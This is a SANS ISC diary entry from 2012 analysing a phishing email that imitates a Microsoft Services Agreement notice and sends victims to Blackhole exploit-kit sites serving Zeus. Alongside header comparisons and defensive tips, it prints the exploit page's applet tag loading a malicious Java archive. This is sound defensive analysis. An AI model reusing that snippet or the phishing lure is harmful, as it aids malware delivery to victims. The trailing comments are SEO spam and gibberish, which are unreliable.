Blackhole targeting Java vulnerability via fake Microsoft Services Agreement email phish

Published: 2012-09-01
Last Updated: 2012-09-01 01:22:41 UTC
by Russ McRee (Version: 1)
3 comment(s)

Thanks to Susan Bradley for reporting this to ISC.

We're receiving multiple reports of a phishing campaign using the template from a legitimate Microsoft email regarding Important Changes to Microsoft Services Agreement and Communication Preferences.

The legitimate version of this email is specific to a services agreement seen here, per a change to Microsoft services as of 27 AUG.

The evil version of this email will subject victim to a hyperlink that will send them to a Blackhole-compromised website, which will in turn deliver a fresh Zeus variant.

I'll walk you though the full sample set I analyzed. Susan sent us an email including the following header snippet:

Received: from [101.5.162.236] ([101.5.162.236])    by
 inbound94.exchangedefender.com (8.13.8/8.13.1) with ESMTP id q7VFDPjO029166

A legitimate header snippet:

Received: from smtpi.msn.com ([65.55.52.232]) by COL0-MC3-F43.Col0.hotmail.com with Microsoft SMTPSVC(6.0.3790.4900)

101.5.162.236 is in China, 65.55.52.232 is Microsoft.

The legitimate email will include a hyperlink for http://email.microsoft.com/Key-9850301.C.DLs15.C.KK.DlNkNK, which points to the above mentioned services agreement.

Obfuscated to protect the innocent: The phishing mail will instead include a hyperlink to the likes of allseasons****.us, radiothat****.com, and likely a plethora of others. I assessed radiothat****.com and was redirected to 209.x.y.14 which is running the very latest Blackhole evil as described on 28 AUG by Websense in this post.

Source code review of the web page served included <applet/code="ndshesa.ndshesf"/archive="Leh.jar"><param/nam=123 name=uid value="N013:011:011:04:037:061:061:047:034:076:074:0102:076:074:047:047:047:074:067:053:061:04:074:04:013:04:075:054:071:034:067:053:034:034:02:065:071:034"/></applet>

The VirusTotal link for Leh.jar is here, and the VirusTotal link for the Zeus variant offered is here.

Recommendations:

  1. Hover over hyperlinks and ensure they are directing you to legitimate sites before clicking. Be cautious even thereafter.
  2. Contemplate disabling Java until the next update is released.
  3. Review email headers if in doubt for messages you receive that seem suspicious.
  4. Keep your antimalware signatures up to date. While limited at the moment, detection for both the Java exploit and the Zeus variant is increasing.

Ping us with questions or comments, as well as anything you'd like to share regarding similarly received emails from this phishing campaign.

Russ McRee | @holisticinfosec

 

 

 

 

 

3 comment(s)

Comments

cwqwqwq
eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>
WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]
dwqqqwqwq mashood
[https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)
[https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]
What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/

Diary Archives